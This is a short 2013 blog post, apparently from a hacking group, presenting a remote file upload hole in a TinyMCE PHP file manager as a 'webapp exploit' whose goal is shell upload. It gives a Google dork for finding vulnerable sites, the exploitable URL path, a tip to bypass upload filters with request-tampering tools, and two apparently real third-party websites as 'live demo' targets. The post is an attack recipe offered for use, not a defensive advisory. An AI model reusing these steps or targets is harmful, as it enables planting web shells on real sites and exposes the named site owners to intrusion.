Saturday, October 19, 2013

Tinymce PHP file Manager, Remote File upload vulnrablity

BY Unknown IN , No comments


Title :Tinymce PHP file Manager, Remote File upload vulnrablity
server : Linux
Author: NoentryPHC
Type : webapp Exploit
Hamr : remote shell upload
Dork : inurl:/file_manager.php?type=img

Goto google.com and type dork inurl:/file_manager.php?type=img & inurl:/file_manager.php?type=file to Find vulnrable websites, to get more sites you can modify this dork,
Exploit Patch : http://www.site.com/directory/tinymce/file_manager.php?type=file
so Goto http://www.site.com/directory/tinymce/file_manager.php?type=file  and upload your file there,
if php & html uploading is denided, you can try Tamper Data and Live Http Headers
Live demo :
http://piter-ka.ru/media/tinymce/file_manager.php?type=file
http://www.oki-iroda.hu/72h2010/tinymce/jscripts/file_manager.php?type=img

0 comments:

Post a Comment